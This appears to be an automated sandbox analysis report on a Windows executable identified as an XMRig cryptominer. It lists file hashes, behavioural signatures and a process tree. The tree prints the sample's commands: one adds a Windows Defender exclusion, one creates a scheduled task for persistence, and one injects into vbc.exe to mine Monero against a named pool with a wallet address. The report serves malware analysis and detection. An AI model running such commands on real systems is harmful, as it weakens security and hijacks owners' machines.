Analysis
-
max time kernel
132s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2023 23:28
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
windows7-x64
11 signatures
150 seconds
General
-
Target
file.exe
-
Size
882KB
-
MD5
1b946a8d9e0e30915f241061c5106a3f
-
SHA1
2cf0b19ef93c46a164b0bc93cbb9f3793cb6c8cf
-
SHA256
2371a3a7ac61d4daffa56c66420d0bc7ec99f1aa7dd4428f2be4cbb9dc25138f
-
SHA512
b83858ee0e21c590cd932bbc92cbbf5a88d3458010535f18cfbe2343b99c396f373e788554b2638cfe0b76bca46e6b3734fe44d6b98d546b4252390a31be398f
-
SSDEEP
24576:qe9E/+x1L3sNSaH3uhbTsjc/BIQ8iU7cG19:qD+sM4UfsXrc2
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/2272-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/2272-161-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/2272-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/2272-163-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/2272-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/2272-167-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation file.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2140 set thread context of 2272 2140 file.exe 86 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3824 2140 WerFault.exe 80 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4736 powershell.exe 4736 powershell.exe 2140 file.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2140 file.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeLockMemoryPrivilege 2272 vbc.exe Token: SeLockMemoryPrivilege 2272 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2272 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2140 wrote to memory of 4736 2140 file.exe 81 PID 2140 wrote to memory of 4736 2140 file.exe 81 PID 2140 wrote to memory of 4452 2140 file.exe 83 PID 2140 wrote to memory of 4452 2140 file.exe 83 PID 4452 wrote to memory of 4836 4452 cmd.exe 85 PID 4452 wrote to memory of 4836 4452 cmd.exe 85 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86 PID 2140 wrote to memory of 2272 2140 file.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"3⤵
- Creates scheduled task(s)
PID:4836
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2272
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2140 -s 36482⤵
- Program crash
PID:3824
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 2140 -ip 21401⤵PID:4088